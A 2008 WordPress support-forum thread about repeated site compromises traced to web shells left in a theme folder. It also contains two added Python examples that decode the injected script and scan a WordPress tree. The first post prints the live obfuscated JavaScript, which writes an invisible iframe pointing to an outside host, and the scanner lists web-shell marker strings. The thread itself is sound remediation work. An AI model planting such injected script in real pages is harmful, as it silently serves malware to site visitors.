WordPress 2.3.3 HACKED (17 posts)

  1. Skitals
    Posted 8 years ago #

    Last week my site was hacked. Multiple wordpress files had the following code appended at the very end:

    <script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C101%2C97%2C45%2C100%2C118%2C46%2C114%2C117%2C47%2C116%2C100%2C115%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script>

    This was in many wp-*.php files. I wiped my entire website's http root and installed the latest version of WP (2.3.3) since I was running an older version and I knew there were security fixes. I thought I was covered, until last night the same exact exploit was performed on my site. Again, this is a 100% clean 2.3.3 installation. I'm 99% confident this has nothing to do with a password hack or any type of internal access since the js code is haphazardly appended to the end of various files. The only way I even noticed this "hack" is because the code invalidates/breaks my rss feed.

    I found one prior instance of this hack on this board, and it was with an older version of wordpress. I have NOTHING else installed on this site; the wordpress 2.3.3 files are the only ones in my http root. The ONLY plugins I have installed or even on the server are Akismet and Feed Locations.

    Aside from changing my passwords (which I'm certain will not close this loophole), is there any way to prevent this from happening?
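    The appended code is only obfuscated, not encrypted, so what it does can be read without running it. The following Python is an added example, not code from the thread: it unwraps the eval(unescape(...)) and String.fromCharCode layers with plain string handling (never executing the script) and reports any iframe the result would write into the page with zero size or hidden styling. The SAMPLE constant is the snippet quoted above, split across lines for readability.

```python
"""Static unwrapping of the eval(unescape(...String.fromCharCode(...))) pattern.

Added example, not code from the thread: decodes the layers with string
handling only and never executes the script, so the hidden markup can be
inspected safely in an editor or a log.
"""
import re

# Constructed sample: the snippet quoted in the first post, split for readability.
SAMPLE = (
    '<script language="JavaScript"> eval(unescape("'
    'document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32'
    '%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C101%2C97%2C45%2C100%2C118'
    '%2C46%2C114%2C117%2C47%2C116%2C100%2C115%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112'
    '%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104'
    '%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B'
    '")); </script>'
)

EVAL_UNESCAPE = re.compile(r'eval\s*\(\s*unescape\s*\(\s*"([^"]*)"\s*\)\s*\)')
FROM_CHAR_CODE = re.compile(r'String\.fromCharCode\s*\(\s*([\d\s,]+)\)')
PERCENT_U = re.compile(r'%u([0-9a-fA-F]{4})')
PERCENT_XX = re.compile(r'%([0-9a-fA-F]{2})')
IFRAME = re.compile(r'<iframe\b([^>]*)>', re.IGNORECASE)


def js_unescape(text: str) -> str:
    """Mimic JavaScript's legacy unescape(): %uXXXX first, then %XX, one code point each."""
    text = PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), text)
    return PERCENT_XX.sub(lambda m: chr(int(m.group(1), 16)), text)


def expand_from_char_code(text: str) -> str:
    """Replace each String.fromCharCode(a,b,c) call with the characters it builds."""
    def build(m):
        codes = [int(c) for c in m.group(1).replace(" ", "").split(",") if c]
        return "".join(chr(c) for c in codes)
    return FROM_CHAR_CODE.sub(build, text)


def unwrap(snippet: str, max_layers: int = 5) -> str:
    """Peel eval(unescape("...")) layers until none is left (bounded, in case of nesting)."""
    text = snippet
    for _ in range(max_layers):
        m = EVAL_UNESCAPE.search(text)
        if not m:
            break
        text = expand_from_char_code(js_unescape(m.group(1)))
    return expand_from_char_code(text)


def hidden_iframe_sources(decoded: str) -> list:
    """Return src values of iframes that are 0x0 or hidden via CSS in the decoded text."""
    found = []
    for m in IFRAME.finditer(decoded):
        attrs = m.group(1)
        src = re.search(r'src\s*=\s*["\']?([^"\'\s>]+)', attrs, re.IGNORECASE)
        zero = re.search(r'(width|height)\s*=\s*["\']?0\b', attrs, re.IGNORECASE)
        css_hidden = re.search(r'display\s*:\s*none|visibility\s*:\s*hidden', attrs, re.IGNORECASE)
        if src and (zero or css_hidden):
            found.append(src.group(1))
    return found


def analyze(snippet: str) -> dict:
    """Decode one injected snippet and list the hidden iframe targets it would write."""
    decoded = unwrap(snippet)
    return {"decoded": decoded, "hidden_iframe_srcs": hidden_iframe_sources(decoded)}


if __name__ == "__main__":
    report = analyze(SAMPLE)
    print(report["decoded"])
    print("hidden iframes:", report["hidden_iframe_srcs"])
```

Run against the quoted snippet, the decoded text is a single document.write() of an invisible iframe; the src value is what to report to the host and to block at the proxy, and the decoded form is what to grep other files for rather than the percent-encoded blob, which attackers vary between infections.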

  2. Skitals
    Posted 8 years ago #

    As far as I can tell, the only file modified this time around was wp-settings.php. Removing the code from that file fixed my rss feed, but there still may be more modified files that I can't find as there was last time.

  3. moshu
    Posted 8 years ago #

    Yes. You can inform, no, you must inform your host. It might happen that the server has been hacked through another site and from there they (the hackers) got access to all sites on that machine...

  4. whooami
    Posted 8 years ago #

    I'm 99% confident this has nothing to do with a password hack or any type of internal access since the js code is haphazardly appended to the end of various files.

    and the permissions of those files were?

    here are some headers returned by your site:

    HTTP/1.1 200 OK
    Date: Thu, 21 Feb 2008 03:37:32 GMT
    Server: Apache/2.0.54 (Unix) PHP/4.4.7 mod_ssl/2.0.54 OpenSSL/0.9.7e mod_fastcgi/2.4.2 DAV/2 SVN/1.4.2
    X-Powered-By: PHP/5.2.3
    X-Pingback: http://www.gamerawr.com/xmlrpc.php
    Vary: Accept-Encoding
    Content-Type: text/html; charset=UTF-8

    You may not know this but Apache 2.0.54 is a little dated, and there have been several security issues fixed since that release.

    Is that a dreamhost issue, yes, but that doesn't make it any less an issue.

    I point that out not necessarily to cast doubt, but to say that files being physically changed lends credence to it not being a WP hack, but a server side problem related to what is hosting your site OR a permissions weakness that allowed a breach.

    I can put up a static HTML page on an insecure web server with insecure permissions, and I will be able to find someone that is able to tack malicious code onto that file.

  5. Skitals
    Posted 8 years ago #

    Ok, I will be contacting dreamhost... but regarding permissions... how should I set my permissions for a wordpress install? You know how WP is, with the over-simplified instructions. I will be honest, I didn't do anything but upload all the files and run the upgrade script.

  6. Skitals
    Posted 8 years ago #

    Ok, a support ticket has been sent to dreamhost. Sorry I was so quick to blame this on WP, I just forgot how many variables there are involved in this, especially when running a site on a shared server I don't administer. I was just under the impression dreamhost was more security conscious than this :(

  7. Skitals
    Posted 8 years ago #

    I checked my permissions of wp-settings.php (the file hacked), and it is set to 644, which I BELIEVE is correct. Please let me know if this shines any new light on the issue.

  8. moshu
    Posted 8 years ago #

    files = 644
    folders = 755
    That's the correct setting. However, on many hosts you need to make folders like wp-content 777 (i.e. world writable) in order to be able to upload images...

  9. whooami
    Posted 8 years ago #

    I'll bet dollars for donuts that dreamhost calls it out as a WP problem :P

    Not to suggest that it might not be, just that it's easier for a host to blame a software package, no matter what the cause.

  10. Skitals
    Posted 8 years ago #

    We will see. I gave them a link to this thread as reference. I've yet to hear back from them.

  11. Skitals
    Posted 8 years ago #

    Crap. It looks like this may all be my own fault. When my site was first hacked with an ancient wordpress version, yes, I erased my entire http root and installed the latest wp release. But what did I copy back? My wp theme. And what was in my theme directory? TWO HACKED PHP/JAVA SCRIPTS!

    One appears to be "nstview", a file management script included with a lot of "web hacking for newbs" kits. It is tagged at the bottom: <!-- Network security team :: nst.void.ru -->

    The other is "C99madShell v. 2.0 madnet edition" which also looks to be a remote file manager.

    Now, I have no way of knowing if these are from a related hack, but clearly these are wide open backdoors that hackers somehow installed on my OLD wordpress installation. I can't believe I'm dense enough to not thoroughly check my personal theme directory when I was trying to be so meticulous in my upgrade.

    With these files removed (that entire theme directory, actually), I guess it's now just a game of wait and see. I should do a fine search to see if anything else has been tampered with while this backdoor was in place.

    Interestingly enough BOTH of these shell scripts as well as "PHP Injection Scanner" tools were recently posted in a "web hacking tools collection" posted on this script kiddie site: http://www.katzforums.com/showthread.php?t=50022 No doubt that package has everything that was used in this exploit.

    The only question that remains is: is my site still vulnerable?

  12. Skitals
    Posted 8 years ago #

    I'm nearly certain whoever did this used the hacking toolset I posted above. I'm looking through it all now, and it even includes an xmlrpc vulnerability scanner and exploiter, which is what I believe the latest WP security update patches.

    So it looks like case closed. It was a known wp vulnerability that was recently patched. The moral of the story is: always keep your installation up to date, and DO NOT BLINDLY COPY BACK YOUR CUSTOMIZED FILES. Perhaps the WP readme should make a point of this in the future. While the vulnerability was plugged, I was still left with the malicious software that was installed.
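    Two practical checks come out of this thread: the 644/755 permissions moshu gives in post 8, and the "fine search" for tampered files that Skitals mentions after finding the two file-manager scripts in his theme directory. The following Python is an added example, not code from the thread. It walks a WordPress tree and reports world-writable entries, files containing the marker strings quoted above (nst.void.ru, nstview, C99madShell), eval() wrapped around a decoder as in the first post, and a script tag appended after the final closing tag of a core wp-*.php file. The demo() tree it scans is constructed inline as a stand-in for a real install.

```python
"""Offline scan of a WordPress tree for the tampering described in this thread.

Added example, not code from the thread. It looks for the three things the
posters ran into: a <script> tag appended after the closing ?> of a core
wp-*.php file, files carrying the web-shell markers found in the theme
directory, and permissions looser than the recommended 644/755.
"""
import os
import re
import stat
import tempfile

# Marker strings quoted in the thread (post 11); a match means "look at this file".
SHELL_MARKERS = ("nst.void.ru", "nstview", "C99madShell")
# eval() wrapped around a decoder is the shape of the injected code in post 1.
OBFUSCATED_EVAL = re.compile(
    r'eval\s*\(\s*(?:unescape|base64_decode|gzinflate|str_rot13)\s*\(', re.IGNORECASE)
FILE_MODE = 0o644   # files = 644 (post 8)
DIR_MODE = 0o755    # folders = 755 (post 8)


def check_mode(path, is_dir, root):
    """Flag world-writable entries, and note any other deviation from 644/755."""
    mode = stat.S_IMODE(os.lstat(path).st_mode)
    rel = os.path.relpath(path, root)
    if mode & stat.S_IWOTH:
        return [(rel, f"world-writable ({oct(mode)})")]
    expected = DIR_MODE if is_dir else FILE_MODE
    if mode != expected:
        return [(rel, f"mode {oct(mode)}, expected {oct(expected)}")]
    return []


def check_php_content(path, root):
    """Content heuristics for one .php file."""
    rel = os.path.relpath(path, root)
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    findings = [(rel, f"web shell marker '{m}'") for m in SHELL_MARKERS if m in text]
    if OBFUSCATED_EVAL.search(text):
        findings.append((rel, "obfuscated eval() call"))
    # Core files end in PHP, so a <script> after the final ?> is foreign.
    # Theme templates legitimately mix HTML, so this check is limited to wp-*.php.
    if os.path.basename(path).startswith("wp-") and "?>" in text:
        tail = text.rsplit("?>", 1)[1]
        if re.search(r"<script\b", tail, re.IGNORECASE):
            findings.append((rel, "<script> appended after the last ?>"))
    return findings


def scan_tree(root):
    """Walk root and return sorted (relative path, message) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            findings += check_mode(os.path.join(dirpath, name), True, root)
        for name in filenames:
            full = os.path.join(dirpath, name)
            findings += check_mode(full, False, root)
            if name.endswith(".php"):
                findings += check_php_content(full, root)
    return sorted(findings)


def demo():
    """Constructed mini-tree reproducing the thread's symptoms; returns the scan result."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "mytheme")
        uploads = os.path.join(root, "wp-content", "uploads")
        os.makedirs(theme)
        os.makedirs(uploads)
        files = {
            "wp-load.php": "<?php\n$clean = true;\n?>\n",
            # stand-in for the appended code from post 1 (payload shortened, constructed)
            "wp-settings.php": '<?php\n$x = 1;\n?>\n<script language="JavaScript"> eval(unescape("%61")); </script>\n',
            os.path.join("wp-content", "themes", "mytheme", "header.php"): "<?php wp_head(); ?>\n</head><body>\n",
            # stand-in for the dropped file-manager script, carrying only its tag line
            os.path.join("wp-content", "themes", "mytheme", "nst.php"):
                "<?php /* constructed stand-in */ ?>\n<!-- Network security team :: nst.void.ru -->\n",
        }
        for rel, body in files.items():
            path = os.path.join(root, rel)
            with open(path, "w") as fh:
                fh.write(body)
            os.chmod(path, FILE_MODE)
        for d in (os.path.join(root, "wp-content"), os.path.dirname(theme), theme):
            os.chmod(d, DIR_MODE)
        os.chmod(uploads, 0o777)   # the "make it 777 to upload images" case from post 8
        return scan_tree(root)


if __name__ == "__main__":
    for rel, msg in demo():
        print(f"{rel}: {msg}")
```

Point scan_tree() at the http root of a real install to get the same report. The marker and eval() checks only catch what this thread saw; the durable version of the "fine search" is to diff the customised theme against the copy that was uploaded before the first incident, so that nothing carried back from the old install goes unexamined.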

  13. AldebaranJill
    Posted 8 years ago #

    Maybe this is a stupid question, but would putting the wp-admin folder under password protection help at all?

  14. moshu
    Posted 8 years ago #

    No, not really.

  15. AldebaranJill
    Posted 8 years ago #

    So I had a client hacked today who had 2.2.?, and after reading this post, I've installed 2.3.3 and then uploaded the custom theme from my computer (which is clean).

    The attack was similar, they modified a header.php file and added some javascript code at the end. Would it help if I posted the javascript here (I don't want to help these hackers, so I wanted to ask first).

    We were tipped off when the client looked at his blog on his PC and got a virus alert about JS/Downloader-AUD and said it was a Trojan.

    (Note, the client was also on DreamHost)

  16. AldebaranJill
    Posted 8 years ago #

    I just wrote a blog article about this and included a screenshot of the VirusAlert message we received. Hope someone will find this helpful.

  17. BenFitts
    Posted 8 years ago #

    I got the same report from my web host. Someone was reporting JS/Downloader-AUD on one of our blogs.

    The blog was running an older WordPress 2.1.3 version.

    Like AldebaranJill the hacker was able to append their javascript onto the end of the header for my WordPress theme.

    For your reference it had a comment which made me think it was for a stats package, but I knew we were using Google Analytics so I knew this code was probably the offender. It also used some javascript to try and encode the iframe caused by the AUD trojan.

    Here is what I did to fix it:
    I upgraded wordpress to 2.3.3
    I removed the offending javascript code
    I temporarily changed permissions on my theme to 644. (when we make theme changes in the future we'll change the permissions back.)

    I hope this helps others who have had the same problem.
    - Ben Fitts

Topic Closed